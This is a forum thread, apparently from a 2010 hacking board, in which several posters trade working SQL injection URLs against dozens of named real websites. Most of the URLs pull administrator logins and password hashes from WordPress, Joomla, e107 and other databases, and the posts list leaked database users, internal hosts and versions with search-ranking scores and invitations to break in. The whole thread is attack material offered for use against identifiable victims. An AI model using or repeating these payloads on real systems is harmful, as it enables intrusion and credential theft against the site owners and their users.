View full version: SQL Injections
http://smu17.ru/stol.php?id=-1+union+select+1,concat(LOGIN,0x3a,PASS)+from+kapi tal_zed_users+limit+0,1--
Tic-30 admin panel /zed/
PS. Through this same SQLi there are another hundred neighbors. Go for it
DarkDante
04.10.2010, 14:16
PHP:
http://blinginbox.com/product.php?cateId=10&sx=-15+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16--
Code:
http://www.yuzhnoye.com/?id=14'%20and%20substring(version(),1,1)=5--%201&path=about_company/history/missiles/missiles
Code:
http://www.sportware.ru/?id=-91+and+1=0+union+select+1,2,version(),4,5,6,7--
Code:
http://www.multi-master.ru/service/detail.php?id=-10+union+select+1,version(),3--
Code:
http://www.irancivilcenter.com/en/news/view.php?news_id=-3+union+select+concat_ws%280x3a,user%28%29,version %28%29,database%28%29%29,2,3,4,5--
Username: iranciv_icc82m@localhost
Version: 5.0.91-community
Database: iranciv_news
Google PR: 5
http://danlempriere.com/articles.php?id=2+and+substring((select+1),1,1)=tr ue
MDB2
no privileges on the mdb2 schema
http://www.simport.ru/?page=3&id=2+and+1=0+union+select+1,2,group_concat%28table _name%29,4,5,6,7+from+information_schema.tables+wh ere+table_schema=database%28%29+--+
Leaky Joomla:
--------------------------------------------------------------------------
http://www.reynoldsburgchurch.org/index.php? option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,3,4,concat_ws%280x3a ,username,p ass word%29,6,7+from+jos_users--
--------------------------------------------------------------------------
http://www.pokermachinez.com/index.php? option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,user%28%29,4,@@versi on,6,concat_ws%280x3a,username,p ass word%29+from+jos_users--
--------------------------------------------------------------------------
http://www.sinab.gov.ec/index.php?option=com_restaurante&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12, 1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3, 3,3,3,4,4,4,4,concat%280x1e,usernam e,0x3a,p ass word,0x1e,0x3a,usertype,0x1e%29+FROM+jos_users--&lang=it
--------------------------------------------------------------------------
http://www.sitgesrestaurantes.com/index.php?option=com_restaurante&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12, 1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3, 3,3,3,4,4,4,4,concat%280x1e,us ername,0x3a,p ass word,0x1e,0x3a,usertype,0x1e%29+FROM+jos_users--&lang=it
--------------------------------------------------------------------------
http://www.sobakavdome.ru/index.php?option=com_iss&task=expotag&id=602+and+1=0+union+select+0,1,2,3,4,group_concat %28us ername,0x3a,p ass word,0x3a,email%29+from+jos_users--
--------------------------------------------------------------------------
The Elusive
05.10.2010, 16:03
Code:
http://isfav.it/index.php?pag=materie&id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20distinct% 20concat(0x7e,0x27,Hex(cast(schema_name%20as%20cha r)),0x27,0x7e)%20FROM%20information_schema.schemat a%20LIMIT%202,1),0x31303235343830303536--
Database isfav_db2
And there are a couple of others there too =)
PR 4
Buggy WordPress:
---------------------------------------------------------------------------
http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat(0x3a,use r_login,0x3a,user_p ass),6,7,8+from+wp_users--
---------------------------------------------------------------------------
http://www.fosa.biz/wp-admin/admin.php?page=people&action=printable&event_id=-15+union+select+0,1,2,concat_ws(user_login,0x3a,u ser_p ass),4+from+wp_users--
(A unique thing for me: the first time I managed to run an SQLi through admin.php)
P.S. The server runs Windows
---------------------------------------------------------------------------
http://www.kfir.co.il/news.php?id=23+and+1=0+union+select+1,group_concat (u ser_login,0x3a,user_p ass),3,4,5,6,7,8,9+from+wp_users--
---------------------------------------------------------------------------
http://www.topbeauty.ro/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat(0x3a,u ser_login,0x3a,user_p ass),6,7,8+from+wp_users--
---------------------------------------------------------------------------
http://www.bulldogdesigninc.com/News.php?id=12+AND+1=2+UNION+SELECT+0,1,2,3,group_ concat(user_login,0x3a,user_pass),5%20from%20wp_us ers--
---------------------------------------------------------------------------
http://www.jeremybouma.net/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
---------------------------------------------------------------------------
http://staroftheseakeywest.com/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
---------------------------------------------------------------------------
http://cycling4fun.com/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
---------------------------------------------------------------------------
http://www.giveawayriches.com/jvblog/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,n ull,concat(0x7c,user_login,0x7c,u ser_p ass,0x7c),null,null,null,null,null,null,null,null% 20%20from%20wp_users
---------------------------------------------------------------------------
P.S. Damn, just how many holes are there....
DezMond™
05.10.2010, 21:27
www.bayern-international.de TIC — 10 PR — 6
Code:
http://www.bayern-international.de/nc/en/business-in-bavaria/key-technologies-in-bavaria/company-details.html?tx_hbkeytech_pi2%5BfirmaID%5D=-28997'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,group_concat(table_name)+ from+information_schema.tables+group+by+table_sche ma+limit+1,1+--+&tx_hbkeytech_pi2%5BkeyTechID%5D=20'
www.blankom.de TIC — 10 PR — 3
Code:
http://www.blankom.de/index.php?id=245&tx_osdbproducts_pi1[cid1]=35&tx_osdbproducts_pi1[cid2]=85&tx_osdbproducts_pi1[cid3]=-170+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26+--+&tx_osdbproducts_pi1[number]=9062.02&cHash=2116147af1&L=1
law.emory.edu TIC — 70 PR — 6
Code:
http://www.law.emory.edu/index.php?id=5132&tx_wfqbe_pi1%5Bid%5D=-73+union+select+1,2,3,4,table_name,6,7,8+from+info rmation_schema.tables+--+
smania.it TIC — 100 PR — 3
Code:
http://www.smania.it/index.php?id=52&L=1&tx_newscatmenu_pi1[parent_category]=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,group_concat(concat_ws(0x3a3a,username,pas sword,admin))+from+be_users+/*+
sfx-360.com TIC — 10 PR — 4
Code:
http://www.sfx-360.com/index.php?idEvent=-56+union+select+1,concat_ws(0x3a3a,user_name,passw ord),3,4,5,6+from+user+--+
alucobond.eu TIC — 10 PR — 1
Code:
http://www.alucobond.eu/distributors-ru.html?&L=5&tx_nicosdirectory_pi1%5Bmode%5D=liste&tx_nicosdirectory_pi1%5Bmodifier%5D=cat&tx_nicosdirectory_pi1%5Bvalue%5D=-8'+union+select+1,2,3,4,5,6,7,8,9,user(),11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33+--+&tx_nicosdirectory_pi1%5Bpointer%5D=0&cHash=2e397a1d90
ofi-am.fr TIC — 10 PR — 4
Code:
http://www.ofi-am.fr/html/ofiWebTV.php?laVideo=/inout/video/52/trussant.flv&idVideo=-52'+union+select+1,concat_ws(0x3a3a,IDADMIN,IDENT, PASS),3,4,5,6,7,8,9,10,11,12+from+ADMIN+--+
oblivion.it TIC — 10 PR — 4
Code:
http://www.oblivion.it/html/obliviontv.php?idvideo=-47+union+select+1,2,user(),4,5,6,7,8+--+
habitatsis.com TIC — 10
Code:
http://www.habitatsis.com/html/hs_formacion/Videos.asp?IdCategoria=1011&Inmobiliaria=&IdVideo=-10022+union+select+1,2,3,4,5,6,7,8,9,10,11+from+in formation_schema.tables+--+
chasse-enligne.com TIC — 10 PR — 3
Code:
http://www.chasse-enligne.com/pub/redirect.php?IDPub=-16+union+select+concat_ws(0x3a3a,login,password)+f rom+admin+limit+0,1+--+
teoremaonline.it TIC — 10 PR — 4
Code:
http://www.teoremaonline.it/index.php?l=en&idn=33&idevent=-24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,concat_ws(0x3a3a,mail,password,surna me),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39+from+privatearea_user+--+&cat=3'&onlpg=4'
bmwmcpiacenza.it TIC — 10
Code:
http://bmwmcpiacenza.it/index.php?obj=site&cmd=event_show&idevent=-10+union+select+1,2,3,4,user(),6,7,8+--+
www.dbugbcn.org TIC — 10 PR — 3
Code:
http://www.dbugbcn.org/index.php?idevent=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,8 2,83,84,85,86,87,88,89,90,91,92,93,94+--+
cqll.be TIC — 10 PR — 4
Code:
http://www.cqll.be/index.php?inc=view_event.php&id=-2+union+select+1,2,concat_ws(0x3a3a,id_level,user, password),4+from+administrateur_site+--+&sid=0&idevent=165'
5aan.com TIC — 10
Code:
http://www.5aan.com/index.php?act=detailproduct&idevent=-36+union+select+1,2,3,4,5,6,7,8,9,10,concat_Ws(0x3 a3a,username,password,email,permasion),12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43+from+adminuser+--+
lettera27.org TIC — 10 PR — 5
Code:
http://www.lettera27.org/index.php?idlanguage=1&zone=9&idprj=1483&idevent=-1528+union+select+user()+--+
And now e107
---------------------------------------------------------------------------
http://www.kna.edu.stockholm.se/e107_plugins/userjournals_menu/userjournals.php?blog.-9999%20union%20all%20select%201,2,3,4,5,6,u ser_p ass word,8,9,0,11,12,13%20from%20e107_user--
---------------------------------------------------------------------------
http://www.lyngholm-thy.dk/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,u ser_p ass word)KHG+from+e107_user+where+user_id=1--
---------------------------------------------------------------------------
http://www.jacksmannequin.org/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,concat(user_name,0x3a,u ser_p ass word),3,4,5,6,7,8,9,10,11,12,13,14,15++from+e107_u ser--
------------------------------------------------------------------------
http://lombardo-mebelsbg.com/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),u ser_name,u ser_p ass word)KHG+from+e107_user+where+user_id=1--
------------------------------------------------------------------------
http://www.stephenslawncare.com/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),u ser_name,user_p ass word)KHG+from+e107_user+where+user_id=1--
------------------------------------------------------------------------
http://www.papagali-bg.com/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),u ser_name,user_p ass word)KHG+from+e107_user--
------------------------------------------------------------------------
http://www.megalit33.ru/plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,use r_p ass word)KHG+from+e107_user+where+user_id=1--
------------------------------------------------------------------------
http://teambmecte.ru/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),u ser_name,user_p ass word)KHG+from+e107_user+where+user_id=1--
------------------------------------------------------------------------
P.S. This is me testing my little program, it's working well
http://www.ahyaqiang.com/En/news.php?id=1+and+row(1,2)in(select+count(*),conca t((select+table_name+from+information_schema.table s+limit+0,1),0x3a,floor(rand(0)*2))as+a+from+infor mation_schema.tables+x+group+by+a)
PR: 1
user: yqdb
database: sqlyqdb
version: 5.0.90-log
Code:
http://www.bda.org.uk/news.php?action=view&news_id=-238+UNION+SELECT+1,concat_ws%280x3a,user%28%29,ver sion%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11+f rom+administrators--
Username: dbo298445383@212.227.29.27
Version: 5.0.91-log
Database: db298445383
Google PR: 6
Code:
http://www.russianw.com/articles/article.php?ID=-615'%20union%20select%201,2,unhex(hex(concat(logna me,0x3a,password,0x3a,email))),4,5,6,7,8,9%20from% 20exp_admin--%201
method=post
The Elusive
06.10.2010, 18:18
Code:
http://jimdunlop.com/index.php?page=products/pip&id=304%20AND%20Length((user()))=22
Google PR=5
http://okasse.ru/_Docs/doc_show.asp?docs_id=103+and+1=0+union+select+1,2, 3,4,5,group_concat(table_name),7,8+from+informatio n_schema.tables+where+table_schema='iskra-6'+--+
TIC : 550
http://www.sigma-is.ru/cgi-bin/news.pl?id_news=303+and+1=0+union+select+1,2,3,4,g roup_concat(column_name),6,7,8+from+information_sc hema.columns+where+table_name='users'+--+
TIC : 475
moodoone
06.10.2010, 19:28
Code:
http://www.vup.hr/index.php?file=pages/rubrika.php&id=-27+union+select+1,group_concat%28table_name%29,3,4 +from+information_schema.tables--+
Code:
http://www.sevtolib.iuf.net/index.php?id=59'%20or%201%20group%20by%20concat(ve rsion(),floor(rand(0)*2))having%20min(0)%20or%201--%201
Premium Yachts
http://www.premiumyachts.ru/news/?view_news=true&news_id=-111+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@ve rsion,user(),database(),@@version_compile_os),5,6, 7,8+--
5.1.43-log py@localhost py portbld-freebsd7.3
spherics
07.10.2010, 12:23
http://article-publisher-pro.phparticlescript.com/rss.php?feed&c=199999999+union+select+1,2,3,concat_ws(0x3a,user (),version(),database()),5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19--&n=all&nc=all
Database Version: 5.0.77-log
Database name: 428043_article
User name: 428043_article@172.17.34.124
http://www.semda.org/info/pyramid.asp?ID=27+union+select+1,2,3,4+from+msysac cessobjects
http://www.africafiles.org/article.asp?ID=22761+or+(1,1)=(select+count(0),con cat((select+version()+from+information_schema.tabl es+limit+0,1),floor(rand(0)*2))from(information_sc hema.tables)+group+by+2)--+
http://www.behavioralhealthcarenetwork.org/profile_view.php?userid=-42+union+select+CONCAT%28user%28%29,%20CHAR%2832,4 5,32%29,%20version%28%29%29+--+
dbo252691846@74.208.16.214 - 5.0.91-log
http://www.vid.net.ua/print.php?id=-20982+union+select+1,2,concat(login,0x3a,password) ,4,5,6,7,8,9,10,11,12+from+personal+limit+0,1--
colorist
08.10.2010, 03:43
I was rolling under the table
http://nefart.ru/to_friend.php?id=-30004'+union+select+1,2,3,4,5,version(),7,8,9,10,1 1,12,13,14+--+
@@version = 5.0.51a-24+lenny3-log
CY = 50
PR = 3
http://www.lumstyle.ru/company/news.htm?news_id=22+and+1=0+union+Select+1,2,3,4,c oncat_ws(0x3a,login,pass),6,7+from+user+limit+0,1+--+
TIC : 450
http://www.oknacm2.ru/about/news/?year=2010&month=02&id=18+and+1=0+union+select+1,2,3,4,group_concat(ta ble_name),6+from+information_schema.tables+where+t able_schema=database()+--+
TIC : 400
http://www.arenabusinesscentres.com/home.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,1,concat_ws (0x3a,password,username),14,15,16,17,18,19,20,21,2 2+from+users--
http://www.4railhorsetransport.com/Home.php?id=-2+union+select+1,version()--
http://www.efimar.com/job.php?id=-2+union+select+1,2,group_concat(0x0b,table_name),4 ,5,6,7+from+information_schema.tables--
http://www.mri.ur.ru/persons.php?id=-2+union+select+1,2,3,group_concat(0x0b,username,0x 3a,user_password,0x3a,user_id),5,6,7+from+phpbb_us ers--
http://www.wowbuenosaires.com/zone.php?id=-2+union+select+1,2,3,4,5,group_concat(0x0b,table_n ame),7,8+from+information_schema.tables--
http://www.iss-reshetnev.ru/?cid=news&nid=1094+or+(select+count(*)from(select+1+union+se lect+2+union+select+3)x+group+by+concat(mid((selec t+TABLE_NAME+from+information_schema.tables+where( table_schema!=0x696E666F726D6174696F6E5F736368656D 61)limit+25,1),1,64),floor(rand(0)*2)))
TIC : 425 PR: 4
Code:
http://www.biznes-pro.com/index.php?page=10&id=15225+and+1=0+union+select+1,2,3,4,5,6,7,8,9,0, 11,12,13,14,version(),16,17--%201
http://www.motifake.com/saveas.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user _password),5,6,7,8+from+mw_user+--
I was looking for porn with lizvicious and ended up on this demotivator service
PR: 4
http://www.assistancedogs.org.au/news.php?newsid=-17+union+select+1,2,3,group_concat(table_name),5,6 +from+information_schema.tables
http://www.tanger.am/news_all.php?news=5-1+union+select+1,2,3,group_concat(user,char(58),pa ssword),5,6+from+admin&lang=rus
http://www.iwf.net/results/results_results.php?placecod=-116+or+(1,1)=(select+count(0),concat((select+conca t_ws(0x3a,name,password)+from+users+limit+0,1),flo or(rand(0)*2))from(information_schema.tables)+grou p+by+2)--+
http://bpascal.ru/res/down.php?download=140+and+1=9+union+select+1,versi on(),3,4,5,6,7,8,9,10
CENTRALIZED LIBRARY SYSTEM OF THE CITY OF SARATOV
http://library.renet.ru/cgi-bin/my_news.pl?cmd=uni&nid=-711+and+1=2+union+select+1,2,concat_ws(0x3a,@@vers ion,user(),database(),@@version_compile_os),4,5+--
4.1.22-log:library@localhost:libraryortbld-freebsd6.2
KandidaT'S
09.10.2010, 10:12
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,concat_ws%280x3a,username,use r_password%29,5,6,7+from+xtremelabs_forums.phpbbfo rums_users+limit+1,1+--+
TIC: 30
http://www.upesh.edu.pk/news.php?news_id=-242+or+(select+count(*)from(select+1+union+select+ 2+union+select+3)x+group+by+concat(mid((select+ver sion()),1),floor(rand(0)*2)))--
PR 6
http://www.nortelglass.com/tools.php?id=-2+union+select+1,2,group_concat(0x0b,table_name),4 ,5,6,7,8,9,10,11,12+from+information_schema.tables--
PR 3
http://goldenflowers.ru/school/articles/?item=-14+and+1=2+union+select+1,2,3,concat_ws(char(58),@ @version,user(),database(),@@version_compile_os),5 ,6+--
5.1.41-log : vbuchnev_mysql@10.1.29.190 : vbuchnev_db : portbld-freebsd7.2
stepashka_
09.10.2010, 21:35
http://www.fitness.shop.pl/producer.php?id=-12+union+select+group_concat(column_name)+from+INF ORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x775f757 36572+--+
TIC: 10
PR: 4
http://www.optsib.ru/?d=2&e9d0ff3e541008&fid=1959+and+1=0+union+select+1,group_concat(table _name+separator+'
')+from+information_schema.tables+where+table_sche ma=database()+--+
TIC : 350
http://ukrmodels.com/ru/showgirl.php?id=548'%20and%201=0%20/*!union*/%20select%201,2,3,4,5,6,7,8,9,10,11,12,table_name, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63, 64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80 ,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,9 7,98,99,100,101,102,103,104,105,106,107,108,109,11 0,111,112,113,114,115,116,117,118,119,120,121,122, 123,124,125,126,127,128,129,130%20from%20informati on_schema./*!tables*/%20limit%2035,1--%201
Ukrainian models )
http://www.mukola.net/news.php?id=28036'+and+1=0+union+select+1,2,3,grou p_concat(table_name)+from+information_schema.table s+Where+table_schema=database()+--+
TIC : 850
http://pult.com.ua/news.php?id=7466&world=1+or+(select+count(*)from(select+1+union+sel ect+2+union+select+3)x+group+by+concat(mid((select +TABLE_NAME+from+information_schema.tables+where(t able_schema!=0x696E666F726D6174696F6E5F736368656D6 1)limit+8,1),1,64),floor(rand(0)*2)))
TIC : 90
http://www.debts.com.ua/news.php?id=25+and+1=0+union+select+1,2,3,group_co ncat(table_name),5+from+information_schema.tables+ Where+Table_schema=database()+--+
TIC : 20 PR: 4
Gemini12
10.10.2010, 19:57
http://ontariosafetyleague.com/training.php?id=-2000’+union+select+1,2,3,4,concat_ws(0x3a,versio n(),database(),user()),6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20+--+
http://ontariosafetyleague.com/admin.php
http://www.artelstroy.com/index.php?house=-1170969905+union+select+1,2,concat_ws(0x3a,@@versi on,user(),database(),@@version_compile_os),4,5+--+
4.0.27-log : watcher@localhost : lehins : pc-linux-gnu
http://www.artelrb.ru/?id=23&n=-79+union+select+1,2,concat_ws(0x3a,@@version,user( ),database(),@@version_compile_os),4,5,6+--&subaction=detail&lang=
4.0.27-log vh27760@zvm15.host.ru vh27760 pc-linux-gnu
Gemini12
10.10.2010, 20:56
http://www.baranltd.com/urunler.php?tur=urun&uid=153+and+1=2+union+select+1,2,3,4,5,unhex(hex(c oncat_ws(0x3a,id,kadi,adsoy,bilgi,ip,songir,expr,s ifre))),7,8,9,10+from+kg--
http://www.mkb10.ru/?class=5&bloc=65&diag=3015+and(1=2)+union+select+version()
MySQL 5.0.90
TIC 10 PR 2
Gemini12
10.10.2010, 23:27
http://www.posscript.ru/index.php?id=2+and+1=2+union+select+1,version(),3, 4+--+
A very strange SQLi...
Code:
http://www.carkitinc.com/carkit2.php?id=-7+UNION+SELECT+1,2,3,concat_ws%280x3a3a,id,Name,Pa ssword%29,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+p assword+LIMIT+0,1+--+
http://minpraud.by/news.php?id=2579+and+1=0+UnIon+selECt+1,2,3,4,5,6, version(),8,9,10,11,12,13,14,15,16,17,18,19,20+--+
http://www.ranak.by/plus/viewrp.php?id=5297+and+1=0+UnIon+selECt+1,version( ),3,4,5,6,7,8,9,10,11,12,13,14+--+
http://www.ssangyong.by/ru/pages/index.php?id=268+and+1=0+UnIon+selECt+1,2,3,4,5,6, group_concat(table_name),8,9,10,11,12,13,14,15,16, 17,18,19,20+from+information_schema.tables+where+t able_schema=0x7373616e67796f6e5f6d61696e+--+
http://www.nastgaz.by/news.php?id=450+and+1=0+UnIon+selECt+1,2,3,4,5,6,g roup_concat(table_name),8,9,10,11,12,13,14,15,16,1 7,18,19,20+from+information_schema.tables+where+ta ble_schema=database()+--+¤t_date=2010-10-07
http://www.minpraud.by/catalog.php?id=4751+and+1=0+UnIon+selECt+1,2,3,4,5 ,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20+--+¤t_date=2010-10-09
http://kosmos95.by/index.php?pageid=45+and+1=0+UnIon+selECt+1,2,3,4,5 ,6,group_concat(table_name),8,9,10,11,12,13,14,15, 16,17,18,19,20+from+information_schema.tables+wher e+table_schema=database()+--++#maintext
http://www.zaslaue.by/news.php?id=4+and+1=0+union+select+1,2,3,4,5,6,7,g roup_concat(table_name+separator+0x3c62723e)+from+ information_schema.tables+where+table_schema=datab ase()--+&lang=be
http://www.byketiki.by/catalog.php?id=33+and+1=0+UnIon+selECt+1,2,3,4,5,6 ,7,8,group_concat(table_name),10,11,12,13,14,15,16 ,17,18,19,20,21+from+information_schema.tables+whe re+table_schema=database()+--+
http://www.smarttech.by/index.php?id=6+and+1=0+UnIon+selECt+1,2,3,4,5,6,7, 8,group_concat(table_name),10,11,12,13,14,15,16,17 ,18,19,20+from+information_schema.tables+where+tab le_schema=database()+--+
http://www.polimersin.by/index.php?id=7+and+1=0+UnIon+selECt+1,2,3,4,5,6,7, 8,group_concat(table_name),10,11,12,13,14,15,16,17 ,18,19,20+from+information_schema.tables+where+tab le_schema=database()+--+
http://www.minskie-okna.ru/page.php?id=7+and+1=0+UnIon+selECt+1,2,3,4,5,6,ver sion(),8,9,10,11,12,13,14,15,16,17,18,19,2+--+
http://znakbuh.ru/index.php?id=4+and+1=0+UnIon+selECt+1,2,3,4,5,6,ve rsion(),8,9,10,11,12,13,14,15,16,17,18,19,20
http://www.asotrabel.by/news.php?id=17+and+1=0+UnIon+selECt+1,2,3,4,5,6,7, 8,group_concat(table_name),10,11,12,13,14,15,16,17 ,18,19,20+from+information_schema.tables+where+tab le_schema=database()+--+
http://sutkiminsk.by/catalog.php?rub=18+and+1=0+UnIon+selECt+1,2,3,4,5, 6,group_concat(table_name),8,9,10,11,12,13,14,15,1 6,17,18,19,20+from+information_schema.tables+where +table_schema=database()+--+&lang=ru
A bit of Joomla:
http://www.ushandball.org/index.php?option=com_rsgallery2&page=inline&id=Acrid&catid=-999999/**/union/**/select/**/0,0,0x3a,0,concat%28username,0x3a,pa ss word%29,0,0,0,0,0,0,0,0/**/from/**/jos_users
PR 5 Cy 10
http://www.flowershow.ru/index.php?option=com_rsgallery2&page=inline&id=Acrid&catid=-999999/**/union/**/select/**/0,0,0x3a,0,concat(username,0x3a,p ass word),0,0,0,0,0,0,0,0/**/from/**/jos_users
PR 4 Cy 240
http://www.kadetstvo.info/index.php?option=com_rsgallery2&page=inline&id=Acrid&catid=-999999/**/union/**/select/**/0,0,0x3a,0,concat(username,0x3a,p ass word),0,0,0,0,0,0,0,0/**/from/**/jos_users
PR 2 Cy 100
http://www.vepsles.spb.ru/veps/index.php?option=com_rsgallery2&page=inline&id=Acrid&catid=-999999/**/union/**/select/**/0,0,0x3a,0,concat(username,0x3a,p ass word),0,0,0,0,0,0,0,0/**/from/**/jos_users
PR 5 Cy 40
http://www.vip-premier.ru/inside.php?action=statia&id=6740&pid=554+and+1=0+union+select+1,2,group_concat(tabl e_name+separator+0x3c62723e),4,5,6,7,8,9+from+info rmation_schema.tables+where+table_schema=database( )+--+
TIC : 100
http://www.coaching-report.de/index.php?id=359+or+(select+count(*)from(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d((select+concat(kennung,char(58),vorname,char(58) ,nachname,char(58),g_mail,char(58),passwort,char(5 8),g_firma,char(58),g_strasse,char(58),g_ort,char( 58),g_plz)+from+op4_admin+limit+0,1),1,64),floor(r and(0)*2)))
PR: 5
http://www.metal1.info/news/news.php?id=11061'+and+1=0+union+select+version()+--+
TIC : 10 PR: 4
http://www.hortinews.com/news.php?id=22627'+and+1=0+UnIon+selECt+1,2,3,4,5, group_concat(table_name+separator+'
'),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+inf ormation_schema.tables+where+table_schema=0x686f72 74696e657773+--+
PR: 3
Satellite Technologies Security Systems
http://www.vgp.ru/?page=main_menu&id=-17+and+1=2+union+select+1,2,concat_ws(0x3a,@@versi on,user(),database(),@@version_compile_os),4,5,6,7 +--
5.0.90 : u17215@78.108.81.211 : b17215_vgp : portbld-freebsd8.1
http://www.setyan.ru/index.php?CID=24+and+1=0+union+select+1,2,3,4,grou p_concat%28table_name%29,6,7,8,9,10+from+informati on_schema.tables+where+table_schema=database%28%29 +--+
doesn't seem to be a repost
http://prideatwork.org/page.php?id=5+and+1=0+union+select+concat(username ,0x3a,password),2+from+jos_users+--+
the result is in the page source
http://www.cadefoundation.org/page.php?id=4+and+1=0+union+select+1,user(),3,4,5+--+
http://www.sevlievo.net/bg/news/news.php?id=571+and+1=0+union+select+1,version(),3 +--+
4.1.22-log
TIC : 10 PR: 4
http://www.shalomtv.tv/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_c oncat(username,0x3a,password),14,15,16,17,18,19,20 ,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
go for it, though I can't get into the admin panel
http://www.build.kz/?page=inc/tov&subcid=1&cid=2&fidlist=136-999.9+union+select+1,2,version%28%29,4,5,6,7,8,9,1 0,11--
http://www.futerovka.ru/?cid=cl&cl=13-999.9+union+select+1,version%28%29,3,4,5,6,7,8--
DezMond™
13.10.2010, 01:23
wciom.ru TIC — 3300 PR — 6
Code:
http://wciom.ru/biblioteka/zhurnal-monitoring/arkhiv/six-ten/index.php?id=195&uid=-13887+union+select+1,2,3,group_concat(concat_ws(0x 3a3a,username,password))+from+wciom_typo3.fe_users +--+
More WordPress:
http://www.pam93.info/actu.php?id=-9999999+union+select+0,1,2,3,concat%28user_login,0 x3a,user_pa ss,0x3a,user_email%29,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23+from+wp_users--
PR 6
P.S. The server runs Windows
http://www.geliosco.ru/news.php?loc=1&id=-32+and+1=2+union+select+1,concat_ws(0x3a,@@version ,user(),database(),@@version_compile_os),3,4,5,6,7 +--
5.0.75-log srv19722_admin@c17-w.ht-systems.ru srv19722_db portbld-freebsd7.0
http://www.geliosco.ru/news.php?loc=1&id=-32+and+1=2+union+select+1,concat(name,0x20,passwor d),3,4,5,6,7+from+admins--
http://www.begamer.ru/content.php?p=2&catId=11&id=-199'+union+select+1,2,3,4,concat_ws(0x3a3a,version (),@@version_compile_os,user(),database()),6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
http://www.phoenixrostov.ru/topics/topic/?pid=8+and+1=0+union+Select+version()+--+
4.1.20-log
TIC : 160 PR: 5
http://www.officefile.ru/news_detail.php?id=872'+and+1=0+union+select+1,2,3 ,version(),5,6,7,8,9,10,11+--+
4.1.20-log
TIC : 140
